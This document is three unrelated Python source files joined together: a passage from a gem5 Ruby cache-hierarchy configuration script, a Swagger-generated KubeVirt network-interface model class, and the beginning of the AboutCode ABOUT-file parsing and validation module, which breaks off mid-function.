replacement_policy = LRUReplacementPolicy())
l0d_cache = L0Cache(size = '4096B', assoc = 1, is_icache = False,
start_index_bit = block_size_bits,
replacement_policy = LRUReplacementPolicy())
# the ruby random tester reuses num_cpus to specify the
# number of cpu ports connected to the tester object, which
# is stored in system.cpu. because there is only ever one
# tester object, num_cpus is not necessarily equal to the
# size of system.cpu; therefore if len(system.cpu) == 1
# we use system.cpu[0] to set the clk_domain, thereby ensuring
# we don't index off the end of the cpu list.
if len(system.cpu) == 1:
clk_domain = system.cpu[0].clk_domain
else:
clk_domain = system.cpu[i].clk_domain
l0_cntrl = L0Cache_Controller(
version = i * num_cpus_per_cluster + j, Icache = l0i_cache,
Dcache = l0d_cache, send_evictions = send_evicts(options),
clk_domain = clk_domain, ruby_system = ruby_system)
cpu_seq = RubySequencer(version = i * num_cpus_per_cluster + j,
icache = l0i_cache,
clk_domain = clk_domain,
dcache = l0d_cache,
ruby_system = ruby_system)
l0_cntrl.sequencer = cpu_seq
l1_cache = L1Cache(size = options.l1d_size,
assoc = options.l1d_assoc,
start_index_bit = block_size_bits,
is_icache = False)
l1_cntrl = L1Cache_Controller(
version = i * num_cpus_per_cluster + j,
cache = l1_cache, l2_select_num_bits = l2_bits,
cluster_id = i, ruby_system = ruby_system)
exec("ruby_system.l0_cntrl%d = l0_cntrl"
% ( i * num_cpus_per_cluster + j))
exec("ruby_system.l1_cntrl%d = l1_cntrl"
% ( i * num_cpus_per_cluster + j))
#
# Add controllers and sequencers to the appropriate lists
#
cpu_sequencers.append(cpu_seq)
l0_cntrl_nodes.append(l0_cntrl)
l1_cntrl_nodes.append(l1_cntrl)
# Connect the L0 and L1 controllers
l0_cntrl.mandatoryQueue = MessageBuffer()
l0_cntrl.bufferToL1 = MessageBuffer(ordered = True)
l1_cntrl.bufferFromL0 = l0_cntrl.bufferToL1
l0_cntrl.bufferFromL1 = MessageBuffer(ordered = True)
l1_cntrl.bufferToL0 = l0_cntrl.bufferFromL1
# Connect the L1 controllers and the network
l1_cntrl.requestToL2 = MessageBuffer()
l1_cntrl.requestToL2.master = ruby_system.network.slave
l1_cntrl.responseToL2 = MessageBuffer()
l1_cntrl.responseToL2.master = ruby_system.network.slave
l1_cntrl.unblockToL2 = MessageBuffer()
l1_cntrl.unblockToL2.master = ruby_system.network.slave
l1_cntrl.requestFromL2 = MessageBuffer()
l1_cntrl.requestFromL2.slave = ruby_system.network.master
l1_cntrl.responseFromL2 = MessageBuffer()
l1_cntrl.responseFromL2.slave = ruby_system.network.master
for j in xrange(num_l2caches_per_cluster):
l2_cache = L2Cache(size = options.l2_size,
assoc = options.l2_assoc,
start_index_bit = l2_index_start)
l2_cntrl = L2Cache_Controller(
version = i * num_l2caches_per_cluster + j,
L2cache = l2_cache, cluster_id = i,
transitions_per_cycle = options.ports,
ruby_system = ruby_system)
exec("ruby_system.l2_cntrl%d = l2_cntrl"
% (i * num_l2caches_per_cluster + j))
l2_cntrl_nodes.append(l2_cntrl)
# Connect the L2 controllers and the network
l2_cntrl.DirRequestFromL2Cache = MessageBuffer()
l2_cntrl.DirRequestFromL2Cache.master = ruby_system.network.slave
l2_cntrl.L1RequestFromL2Cache = MessageBuffer()
l2_cntrl.L1RequestFromL2Cache.master = ruby_system.network.slave
l2_cntrl.responseFromL2Cache = MessageBuffer()
l2_cntrl.responseFromL2Cache.master = ruby_system.network.slave
l2_cntrl.unblockToL2Cache = MessageBuffer()
l2_cntrl.unblockToL2Cache.slave = ruby_system.network.master
l2_cntrl.L1RequestToL2Cache = MessageBuffer()
l2_cntrl.L1RequestToL2Cache.slave = ruby_system.network.master
l2_cntrl.responseToL2Cache = MessageBuffer()
l2_cntrl.responseToL2Cache.slave = ruby_system.network.master
# Run each of the ruby memory controllers at a ratio of the frequency of
# the ruby system
# clk_divider value is a fix to pass regression.
ruby_system.memctrl_clk_domain = DerivedClockDomain(
clk_domain = ruby_system.clk_domain, clk_divider = 3)
dir_cntrl_nodes = create_directories(options, system.mem_ranges,
ruby_system)
for dir_cntrl in dir_cntrl_nodes:
# Connect the directory controllers and the network
dir_cntrl.requestToDir = MessageBuffer()
dir_cntrl.requestToDir.slave = ruby_system.network.master
dir_cntrl.responseToDir = MessageBuffer()
dir_cntrl.responseToDir.slave = ruby_system.network.master
dir_cntrl.responseFromDir = MessageBuffer()
dir_cntrl.responseFromDir.master = ruby_system.network.slave
dir_cntrl.responseFromMemory = MessageBuffer()
for i, dma_port in enumerate(dma_ports):
#
# Create the Ruby objects associated with the dma controller
#
dma_seq = DMASequencer(version = i, ruby_system = ruby_system)
dma_cntrl = DMA_Controller(version = i,
dma_sequencer = dma_seq,
transitions_per_cycle = options.ports,
ruby_system = ruby_system)
exec("ruby_system.dma_cntrl%d = dma_cntrl" % i)
exec("ruby_system.dma_cntrl%d.dma_sequencer.slave = dma_port" % i)
dma_cntrl_nodes.append(dma_cntrl)
# Connect the dma controller to the network
dma_cntrl.mandatoryQueue = MessageBuffer()
dma_cntrl.responseFromDir = MessageBuffer(ordered = True)
dma_cntrl.responseFromDir.slave = ruby_system.network.master
dma_cntrl.requestToDir = MessageBuffer()
dma_cntrl.requestToDir.master = ruby_system.network.slave
all_cntrls = l0_cntrl_nodes + \
l1_cntrl_nodes + \
l2_cntrl_nodes + \
dir_cntrl_nodes + \
dma_cntrl_nodes
# Create the io controller and the sequencer
if full_system:
io_seq = DMASequencer(version=len(dma_ports), ruby_system=ruby_system)
ruby_system._io_port = io_seq
io_controller = DMA_Controller(version = len(dma_ports),
dma_sequencer = io_seq,
ruby_system = ruby_system)
ruby_system.io_controller = io_controller
# Connect the dma controller to the network
io_controller.mandatoryQueue = MessageBuffer()
io_controller.responseFromDir = MessageBuffer(ordered = True)
io_controller.responseFromDir.slave = ruby_system.network.master
io_controller.requestToDir = MessageBuffer()
io_controller.requestToDir.master = ruby_system.network.slave
all_cntrls = all_cntrls + [io_controller]
ruby_system.network.number_of_virtual_networks = 3
topology = create_topology(all_cntrls, options)
return (cpu_sequencers, dir_cntrl_nodes, topology)
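# Illustrative sketch (not part of the original script): the cache-index math
# used in create_system() above, worked for a hypothetical 8-CPU, 2-cluster
# design with four L2 caches and 64-byte cache lines.
def _example_index_math():
    num_cpus, num_clusters, num_l2caches, cacheline_size = 8, 2, 4, 64
    num_cpus_per_cluster = num_cpus / num_clusters           # 4 CPUs/cluster
    num_l2caches_per_cluster = num_l2caches / num_clusters   # 2 L2s/cluster
    l2_bits = int(math.log(num_l2caches_per_cluster, 2))     # 1 bit selects the L2
    block_size_bits = int(math.log(cacheline_size, 2))       # 6 block-offset bits
    l2_index_start = block_size_bits + l2_bits               # indexing starts at bit 7
    return num_cpus_per_cluster, l2_index_start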
|
|
# coding: utf-8
"""
KubeVirt API
This is KubeVirt API an add-on for Kubernetes.
OpenAPI spec version: 1.0.0
Contact: kubevirt-dev@googlegroups.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1VirtualMachineInstanceNetworkInterface(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'info_source': 'str',
'interface_name': 'str',
'ip_address': 'str',
'ip_addresses': 'list[str]',
'mac': 'str',
'name': 'str'
}
attribute_map = {
'info_source': 'infoSource',
'interface_name': 'interfaceName',
'ip_address': 'ipAddress',
'ip_addresses': 'ipAddresses',
'mac': 'mac',
'name': 'name'
}
def __init__(self, info_source=None, interface_name=None, ip_address=None, ip_addresses=None, mac=None, name=None):
"""
V1VirtualMachineInstanceNetworkInterface - a model defined in Swagger
"""
self._info_source = None
self._interface_name = None
self._ip_address = None
self._ip_addresses = None
self._mac = None
self._name = None
if info_source is not None:
self.info_source = info_source
if interface_name is not None:
self.interface_name = interface_name
if ip_address is not None:
self.ip_address = ip_address
if ip_addresses is not None:
self.ip_addresses = ip_addresses
if mac is not None:
self.mac = mac
if name is not None:
self.name = name
@property
def info_source(self):
"""
Gets the info_source of this V1VirtualMachineInstanceNetworkInterface.
Specifies the origin of the interface data collected. values: domain, guest-agent, or both
:return: The info_source of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._info_source
@info_source.setter
def info_source(self, info_source):
"""
Sets the info_source of this V1VirtualMachineInstanceNetworkInterface.
Specifies the origin of the interface data collected. values: domain, guest-agent, or both
:param info_source: The info_source of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._info_source = info_source
@property
def interface_name(self):
"""
Gets the interface_name of this V1VirtualMachineInstanceNetworkInterface.
The interface name inside the Virtual Machine
:return: The interface_name of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._interface_name
@interface_name.setter
def interface_name(self, interface_name):
"""
Sets the interface_name of this V1VirtualMachineInstanceNetworkInterface.
The interface name inside the Virtual Machine
:param interface_name: The interface_name of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._interface_name = interface_name
@property
def ip_address(self):
"""
Gets the ip_address of this V1VirtualMachineInstanceNetworkInterface.
IP address of a Virtual Machine interface. It is always the first item of IPs
:return: The ip_address of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._ip_address
@ip_address.setter
def ip_address(self, ip_address):
"""
Sets the ip_address of this V1VirtualMachineInstanceNetworkInterface.
IP address of a Virtual Machine interface. It is always the first item of IPs
:param ip_address: The ip_address of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._ip_address = ip_address
@property
def ip_addresses(self):
"""
Gets the ip_addresses of this V1VirtualMachineInstanceNetworkInterface.
List of all IP addresses of a Virtual Machine interface
:return: The ip_addresses of this V1VirtualMachineInstanceNetworkInterface.
:rtype: list[str]
"""
return self._ip_addresses
@ip_addresses.setter
def ip_addresses(self, ip_addresses):
"""
Sets the ip_addresses of this V1VirtualMachineInstanceNetworkInterface.
List of all IP addresses of a Virtual Machine interface
:param ip_addresses: The ip_addresses of this V1VirtualMachineInstanceNetworkInterface.
:type: list[str]
"""
self._ip_addresses = ip_addresses
@property
def mac(self):
"""
Gets the mac of this V1VirtualMachineInstanceNetworkInterface.
Hardware address of a Virtual Machine interface
:return: The mac of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._mac
@mac.setter
def mac(self, mac):
"""
Sets the mac of this V1VirtualMachineInstanceNetworkInterface.
Hardware address of a Virtual Machine interface
:param mac: The mac of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._mac = mac
@property
def name(self):
"""
Gets the name of this V1VirtualMachineInstanceNetworkInterface.
Name of the interface, corresponds to name of the network assigned to the interface
:return: The name of this V1VirtualMachineInstanceNetworkInterface.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this V1VirtualMachineInstanceNetworkInterface.
Name of the interface, corresponds to name of the network assigned to the interface
:param name: The name of this V1VirtualMachineInstanceNetworkInterface.
:type: str
"""
self._name = name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1VirtualMachineInstanceNetworkInterface):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
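# Example usage (illustrative only; the values below are made up and this
# helper is not part of the generated code):
def _example_interface_round_trip():
    iface = V1VirtualMachineInstanceNetworkInterface(
        interface_name='eth0',
        ip_address='10.0.2.2',
        ip_addresses=['10.0.2.2'],
        mac='02:00:00:00:00:01',
        name='default')
    # to_dict() yields a plain dict keyed by attribute name, suitable for
    # JSON serialization; to_str()/__repr__ pretty-print the same data.
    return iface.to_dict()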
|
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# ============================================================================
# Copyright (c) 2014 nexB Inc. http://www.nexb.com/ - All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
AboutCode is a tool to process ABOUT files. ABOUT files are small text files
that document the provenance (aka. the origin and license) of software
components as well as the essential obligations such as attribution/credits
and source code redistribution. See the ABOUT spec at http://dejacode.org.
AboutCode reads and validates ABOUT files and collects software component
inventories.
"""
from __future__ import print_function
from StringIO import StringIO
import codecs
from collections import namedtuple
import csv
from datetime import datetime
from email.parser import HeaderParser
from os.path import basename, dirname, join, normpath, realpath
import errno
import httplib
import logging
import optparse
import os
import posixpath
import socket
import string
import sys
import urlparse
import ntpath
__version__ = '2.0.1'
# See http://dejacode.org
__about_spec_version__ = '1.0'
__copyright__ = """
Copyright (c) 2013-2014 nexB Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setLevel(logging.CRITICAL)
handler.setFormatter(logging.Formatter('%(levelname)s: %(message)s'))
logger.addHandler(handler)
def repr_problem(obj):
"""
Return a formatted representation of a given Warn or Error object
suitable for reporting.
"""
field_name = obj.field_name
field_value = obj.field_value
message = obj.message
return ('Field: %(field_name)s, '
'Value: %(field_value)s, '
'Message: %(message)s' % locals())
Warn = namedtuple('Warn', 'code field_name field_value message',)
Warn.__repr__ = repr_problem
Error = namedtuple('Error', 'code field_name field_value message',)
Error.__repr__ = repr_problem
IGNORED = 'field or line ignored problem'
VALUE = 'missing or empty or multiple value problem'
FILE = 'file problem'
URL = 'URL problem'
VCS = 'Version control problem'
DATE = 'Date problem'
ASCII = 'ASCII problem'
SPDX = 'SPDX license problem'
UNKNOWN = 'Unknown problem'
GENATTRIB = 'Attribution generation problem'
MANDATORY_FIELDS = (
'name',
'version',
)
BASIC_FIELDS = (
'about_resource',
'spec_version',
'date',
'description',
'description_file',
'home_url',
'download_url',
'readme',
'readme_file',
'install',
'install_file',
'changelog',
'changelog_file',
'news',
'news_file',
'news_url',
'notes',
'notes_file',
)
OWNERSHIP_FIELDS = (
'contact',
'owner',
'author',
'author_file',
'copyright',
'copyright_file',
)
LICENSE_FIELDS = (
'notice_file',
'notice_url',
'license_text_file',
'license_url',
'license_spdx',
)
FLAG_FIELDS = (
'redistribute',
'attribute',
'track_changes',
)
VCS_FIELDS = (
'vcs_tool',
'vcs_repository',
'vcs_path',
'vcs_tag',
'vcs_branch',
'vcs_revision',
)
CHECKSUM_FIELDS = (
'checksum_sha1',
'checksum_md5',
'checksum_sha256'
)
DJE_FIELDS = (
'dje_component',
'dje_license_key',
'dje_organization',
'dje_license_name'
)
OPTIONAL_FIELDS = (BASIC_FIELDS
+ OWNERSHIP_FIELDS
+ LICENSE_FIELDS
+ FLAG_FIELDS
+ VCS_FIELDS
+ CHECKSUM_FIELDS
+ DJE_FIELDS)
FILE_LOCATIONS_FIELDS = (
'about_resource_location',
'description_file_location',
'readme_file_location',
'install_file_location',
'changelog_file_location',
'news_file_location',
'notes_file_location',
'author_file_location',
'copyright_file_location',
'notice_file_location',
'license_text_file_location',
)
ERROR_WARN_FIELDS = (
'warnings',
'errors'
)
HEADER_ROW_FIELDS = (('about_file',)
+ MANDATORY_FIELDS
+ OPTIONAL_FIELDS)
# SPDX License Identifiers from http://spdx.org/licenses/
# based on SPDX License List version 1.18 released on 2013-04-10
SPDX_LICENSES = (
'AFL-1.1',
'AFL-1.2',
'AFL-2.0',
'AFL-2.1',
'AFL-3.0',
'APL-1.0',
'Aladdin',
'ANTLR-PD',
'Apache-1.0',
'Apache-1.1',
'Apache-2.0',
'APSL-1.0',
'APSL-1.1',
'APSL-1.2',
'APSL-2.0',
'Artistic-1.0',
'Artistic-2.0',
'AAL',
'BitTorrent-1.0',
'BitTorrent-1.1',
'BSL-1.0',
'BSD-2-Clause',
'BSD-2-Clause-FreeBSD',
'BSD-2-Clause-NetBSD',
'BSD-3-Clause',
'BSD-3-Clause-Clear',
'BSD-4-Clause',
'BSD-4-Clause-UC',
'CECILL-1.0',
'CECILL-1.1',
'CECILL-2.0',
'CECILL-B',
'CECILL-C',
'ClArtistic',
'CNRI-Python',
'CNRI-Python-GPL-Compatible',
'CPOL-1.02',
'CDDL-1.0',
'CDDL-1.1',
'CPAL-1.0',
'CPL-1.0',
'CATOSL-1.1',
'Condor-1.1',
'CC-BY-1.0',
'CC-BY-2.0',
'CC-BY-2.5',
'CC-BY-3.0',
'CC-BY-ND-1.0',
'CC-BY-ND-2.0',
'CC-BY-ND-2.5',
'CC-BY-ND-3.0',
'CC-BY-NC-1.0',
'CC-BY-NC-2.0',
'CC-BY-NC-2.5',
'CC-BY-NC-3.0',
'CC-BY-NC-ND-1.0',
'CC-BY-NC-ND-2.0',
'CC-BY-NC-ND-2.5',
'CC-BY-NC-ND-3.0',
'CC-BY-NC-SA-1.0',
'CC-BY-NC-SA-2.0',
'CC-BY-NC-SA-2.5',
'CC-BY-NC-SA-3.0',
'CC-BY-SA-1.0',
'CC-BY-SA-2.0',
'CC-BY-SA-2.5',
'CC-BY-SA-3.0',
'CC0-1.0',
'CUA-OPL-1.0',
'D-FSL-1.0',
'WTFPL',
'EPL-1.0',
'eCos-2.0',
'ECL-1.0',
'ECL-2.0',
'EFL-1.0',
'EFL-2.0',
'Entessa',
'ErlPL-1.1',
'EUDatagrid',
'EUPL-1.0',
'EUPL-1.1',
'Fair',
'Frameworx-1.0',
'FTL',
'AGPL-1.0',
'AGPL-3.0',
'GFDL-1.1',
'GFDL-1.2',
'GFDL-1.3',
'GPL-1.0',
'GPL-1.0+',
'GPL-2.0',
'GPL-2.0+',
'GPL-2.0-with-autoconf-exception',
'GPL-2.0-with-bison-exception',
'GPL-2.0-with-classpath-exception',
'GPL-2.0-with-font-exception',
'GPL-2.0-with-GCC-exception',
'GPL-3.0',
'GPL-3.0+',
'GPL-3.0-with-autoconf-exception',
'GPL-3.0-with-GCC-exception',
'LGPL-2.1',
'LGPL-2.1+',
'LGPL-3.0',
'LGPL-3.0+',
'LGPL-2.0',
'LGPL-2.0+',
'gSOAP-1.3b',
'HPND',
'IPL-1.0',
'Imlib2',
'IJG',
'Intel',
'IPA',
'ISC',
'JSON',
'LPPL-1.3a',
'LPPL-1.0',
'LPPL-1.1',
'LPPL-1.2',
'LPPL-1.3c',
'Libpng',
'LPL-1.02',
'LPL-1.0',
'MS-PL',
'MS-RL',
'MirOS',
'MIT',
'Motosoto',
'MPL-1.0',
'MPL-1.1',
'MPL-2.0',
'MPL-2.0-no-copyleft-exception',
'Multics',
'NASA-1.3',
'Naumen',
'NBPL-1.0',
'NGPL',
'NOSL',
'NPL-1.0',
'NPL-1.1',
'Nokia',
'NPOSL-3.0',
'NTP',
'OCLC-2.0',
'ODbL-1.0',
'PDDL-1.0',
'OGTSL',
'OLDAP-2.2.2',
'OLDAP-1.1',
'OLDAP-1.2',
'OLDAP-1.3',
'OLDAP-1.4',
'OLDAP-2.0',
'OLDAP-2.0.1',
'OLDAP-2.1',
'OLDAP-2.2',
'OLDAP-2.2.1',
'OLDAP-2.3',
'OLDAP-2.4',
'OLDAP-2.5',
'OLDAP-2.6',
'OLDAP-2.7',
'OPL-1.0',
'OSL-1.0',
'OSL-2.0',
'OSL-2.1',
'OSL-3.0',
'OLDAP-2.8',
'OpenSSL',
'PHP-3.0',
'PHP-3.01',
'PostgreSQL',
'Python-2.0',
'QPL-1.0',
'RPSL-1.0',
'RPL-1.1',
'RPL-1.5',
'RHeCos-1.1',
'RSCPL',
'Ruby',
'SAX-PD',
'SGI-B-1.0',
'SGI-B-1.1',
'SGI-B-2.0',
'OFL-1.0',
'OFL-1.1',
'SimPL-2.0',
'Sleepycat',
'SMLNJ',
'SugarCRM-1.1.3',
'SISSL',
'SPL-1.0',
'Watcom-1.0',
'NCSA',
'VSL-1.0',
'W3C',
'WXwindows',
'Xnet',
'X11',
'XFree86-1.1',
'YPL-1.0',
'YPL-1.1',
'Zimbra-1.3',
'Zlib',
'ZPL-1.1',
'ZPL-2.0',
'ZPL-2.1',
)
# Maps lowercase id to standard ids with official case
SPDX_LICENSE_IDS = dict((name.lower(), name) for name in SPDX_LICENSES)
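# Illustrative helper (not part of the original module): the lowercase map
# recovers the official casing of a user-supplied SPDX id.
def _example_spdx_case_lookup():
    assert SPDX_LICENSE_IDS.get('apache-2.0') == 'Apache-2.0'
    assert SPDX_LICENSE_IDS.get('no-such-id') is None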
# Use DJE License Name
COMMON_LICENSES = (
'AES-128 v3.0 License',
'Apache License 1.1',
'Apache License 2.0',
'Apple Attribution License 1997',
'Apple Example Code License',
'Apple Public Source License 2.0',
'Arphic Public License',
'Artistic License (Perl) 1.0',
'Artistic License 2.0',
'Bitstream Vera Font License',
'Boost Software License 1.0',
'Broadcom CFE License',
'BSD-Modified',
'BSD-Original',
'BSD-Original-UC',
'BSD-Simplified',
'CMU Computing Services License',
'Common Development and Distribution License 1.0',
'Common Development and Distribution License 1.1',
'Common Public License 1.0',
'Creative Commons Attribution License 2.5',
'Creative Commons Attribution Share Alike License 3.0',
'Curl License',
'FreeType Project License',
'GNU General Public License 2.0',
'GNU General Public License 2.0 with Bison exception',
'GNU General Public License 2.0 with GLIBC exception',
'GNU General Public License 3.0',
'GNU Lesser General Public License 2.1',
'GNU Library General Public License 2.0',
'GPL 2.0 or later with Linking exception',
'GPL 2.0 with Broadcom Linking exception',
'Independent JPEG Group License',
'ISC License (ISCL)',
'Larabie Fonts EULA',
'Libpng License',
'Microsoft Limited Public License',
'Microsoft Public License',
'Microsoft Reciprocal License',
'Microsoft TrueType Fonts EULA',
'MIT License',
'Mozilla Public License 1.1',
'Net SNMP License',
'Netscape Public License 1.1',
'NTP License',
'OpenSSL/SSLeay License',
'Original SSLeay License with Windows exception',
'RSA Data Security MD4',
'RSA Data Security MD5',
'SFL License Agreement',
'SGI Free Software License B v2.0',
'Sun RPC License',
'TCL/TK License',
'Tidy License',
'University of Illinois/NCSA Open Source License',
'X11 License',
'ZLIB License',
)
def posix_path(path):
"""
Return a path using the posixpath separator given a path that may
contain posix or windows separators, converting \ to /.
"""
return path.replace(ntpath.sep, posixpath.sep)
def is_about_file(path):
"""
Return True if the path represents a valid ABOUT file name.
"""
return path.lower().endswith('.about')
def resource_name(resource_path):
"""
Return a resource name based on a posix path (either the filename or
directory name). Recurse to handle paths that ends with a path separator
"""
left, right = posixpath.split(resource_path)
if right:
return right.strip()
elif left and left != '/':
# recurse for directories that end up with a /
return resource_name(left)
else:
return ''
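# Illustrative sketch (not part of the original module) exercising the path
# helpers above; the paths are made-up examples.
def _example_path_helpers():
    assert posix_path('src\\pkg\\notice.ABOUT') == 'src/pkg/notice.ABOUT'
    assert is_about_file('notice.ABOUT') and is_about_file('notice.about')
    assert resource_name('/some/dir/') == 'dir'
    assert resource_name('/some/dir/name.c') == 'name.c'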
def check_network_connection():
"""
Return True if an HTTP connection to some public web site is possible.
"""
http_connection = httplib.HTTPConnection('dejacode.org', timeout=10)
try:
http_connection.connect()
except socket.error:
return False
else:
return True
has_network_connectivity = check_network_connection()
class AboutFile(object):
"""
Represent an ABOUT file and functions to parse and validate a file.
"""
def __init__(self, location=None):
self.about_resource = None
self.location = location
self.parsed = None
self.parsed_fields = None
self.validated_fields = {}
# map _file fields to a resolved OS file system absolute location
# this is not used at all for now
self.file_fields_locations = {}
self.warnings = []
self.errors = []
if self.location:
self.parse()
def __repr__(self):
return repr((self.parsed, self.parsed_fields, self.validated_fields,))
def parse(self):
"""
Parse and validate the file at self.location into an ABOUT
structure.
"""
try:
with open(self.location, 'rU') as file_in:
# FIXME: we should open the file only once, it is always small
# enough to be kept in memory
no_blank_lines, pre_proc_warnings = self.pre_process(file_in)
self.warnings.extend(pre_proc_warnings)
# HeaderParser.parse returns the parsed file as keys and
# values (allows for multiple keys, and it doesn't validate)
self.parsed = HeaderParser().parse(no_blank_lines)
except IOError as e:
err_msg = 'Cannot read ABOUT file: ' + repr(e)
self.errors.append(Error(FILE, None, self.location, err_msg))
except Exception as e:
err_msg = 'Unknown ABOUT processing error: ' + repr(e)
self.errors.append(Error(UNKNOWN, None, self.location, err_msg))
if self.parsed:
self.warnings.extend(self.normalize())
self.validate()
def pre_process(self, file_in):
"""
Pre-process an ABOUT file before using the email header parser.
Return a tuple with a file-like object and a list of warnings.
In the file-like object we remove:
- blank/empty lines
- invalid lines that cannot be parsed
- spaces around the colon separator
This also checks for field names with incorrect characters that could
not be otherwise parsed.
"""
# TODO: add line endings normalization to LF
about_string = ''
warnings = []
last_line_is_field_or_continuation = False
for line in file_in.readlines():
# continuation line
if line.startswith(' '):
warn = self.check_line_continuation(
line, last_line_is_field_or_continuation)
if last_line_is_field_or_continuation:
about_string += line
if warn:
warnings.append(warn)
continue
# empty or blank line
if not line.rstrip():
last_line_is_field_or_continuation = False
continue
# From here on, we should have a field line; treat lines without a
# colon as non-field lines
warn, has_colon = self.check_line_has_colon(line)
if not has_colon:
last_line_is_field_or_continuation = False
warnings.append(warn)
continue
# invalid space characters
splitted = line.split(':', 1)
field_name = splitted[0].rstrip()
warn = self.check_invalid_space_characters(field_name, line)
if warn:
last_line_is_field_or_continuation = False
warnings.append(warn)
continue
else:
line = field_name + ':' + splitted[1]
# invalid field characters
_invalid_chars, warn = (
check_invalid_chars(field_name, line))
if warn:
warnings.append(warn)
last_line_is_field_or_continuation = False
continue
# finally add valid field lines
last_line_is_field_or_continuation = True
about_string += line
# TODO: we should either yield and not return a stringIO or return a
# string
return StringIO(about_string), warnings
@staticmethod
def check_line_continuation(line, continuation):
warnings = ''
if not continuation:
msg = 'Line does not contain a field or continuation: ignored.'
warnings = Warn(IGNORED, None, line, msg)
return warnings
@staticmethod
def check_line_has_colon(line):
warnings = ''
has_colon = True
if ':' not in line:
msg = 'Line does not contain a field: ignored.'
warnings = Warn(IGNORED, None, line, msg)
has_colon = False
return warnings, has_colon
@staticmethod
def check_invalid_space_characters(field_name, line):
warnings = ''
if ' ' in field_name:
msg = 'Field name contains spaces: line ignored.'
warnings = Warn(IGNORED, field_name, line, msg)
return warnings
def normalize(self):
"""
Convert field names to lower case. If a field name occurs multiple
times, keep only the last occurrence.
"""
warnings = []
for field_name, value in self.parsed.items():
field_name = field_name.lower()
if field_name in self.validated_fields:
field_value = self.validated_fields[field_name]
msg = 'Duplicate field names found: ignored.'
warnings.append(Warn(IGNORED, field_name, field_value, msg))
# if this is a multi-line value, we want to strip the first space
# of the continuation lines
if '\n' in value:
value = value.replace('\n ', '\n')
self.validated_fields[field_name] = value
return warnings
def validate(self):
"""
Validate a parsed about file.
"""
invalid_name = self.invalid_chars_in_about_file_name(self.location)
if invalid_name:
msg = 'The filename contains invalid characters.'
self.errors.append(Error(ASCII, None, invalid_name, msg))
dup_name = self.duplicate_file_names_when_lowercased(self.location)
if dup_name:
msg = 'Duplicate filename detected in the same directory.'
self.errors.append(Error(FILE, None, dup_name, msg))
self.validate_field_values_are_not_empty()
self.validate_about_resource_exist()
self.validate_mandatory_fields_are_present()
for field_name, value in self.validated_fields.items():
self.check_is_ascii(value)
self.validate_file_field_exists(field_name, value)
self.validate_url_field(field_name, network_check=False)
self.validate_spdx_license(field_name, value)
self.check_date_format(field_name)
def validate_field_values_are_not_empty(self):
for field_name, value in self.validated_fields.items():
if value.strip():
continue
if field_name in MANDATORY_FIELDS:
err = Error(VALUE, field_name, None,
'This mandatory field has no value.')
self.errors.append(err)
elif field_name in OPTIONAL_FIELDS:
err = Warn(VALUE, field_name, None,
'This optional field has no value.')
self.warnings.append(err)
else:
warn = Warn(VALUE, field_name, None,
'This field has no value.')
self.warnings.append(warn)
def _exists(self, file_path):
"""
Return True if path exists.
"""
if file_path:
return os.path.exists(self._location(file_path))
def _location(self, file_path):
"""
Return absolute location for a posix file_path.
"""
if file_path:
file_path = os.path.join(os.path.dirname(self.location),
file_path.strip())
file_path = os.path.abspath(file_path)
return file_path
def _save_location(self, field_name, file_path):
# TODO: we likely should not inject this in the validated fields and
# maybe use something else for this
self.file_fields_locations[field_name] = self._location(file_path)
def validate_about_resource_exist(self):
"""
Ensure that the resource referenced by the about_resource field
exists.
"""
about_resource = 'about_resource'
# Note: a missing 'about_resource' field error will be caught in
# validate_mandatory_fields_are_present(self)
if (about_resource in self.validated_fields
and self.validated_fields[about_resource]):
self.about_resource = self.validated_fields[about_resource]
if not self._exists(self.about_resource):
self.errors.append(Error(FILE, about_resource,
self.about_resource,
'File does not exist.'))
self._save_location(about_resource, self.about_resource)
def validate_file_field_exists(self, field_name, file_path):
"""
Ensure a _file field in the OPTIONAL_FIELDS points to an existing
file.
"""
if not field_name.endswith('_file'):
return
if not file_path:
return
if field_name not in OPTIONAL_FIELDS:
return
if not self._exists(file_path):
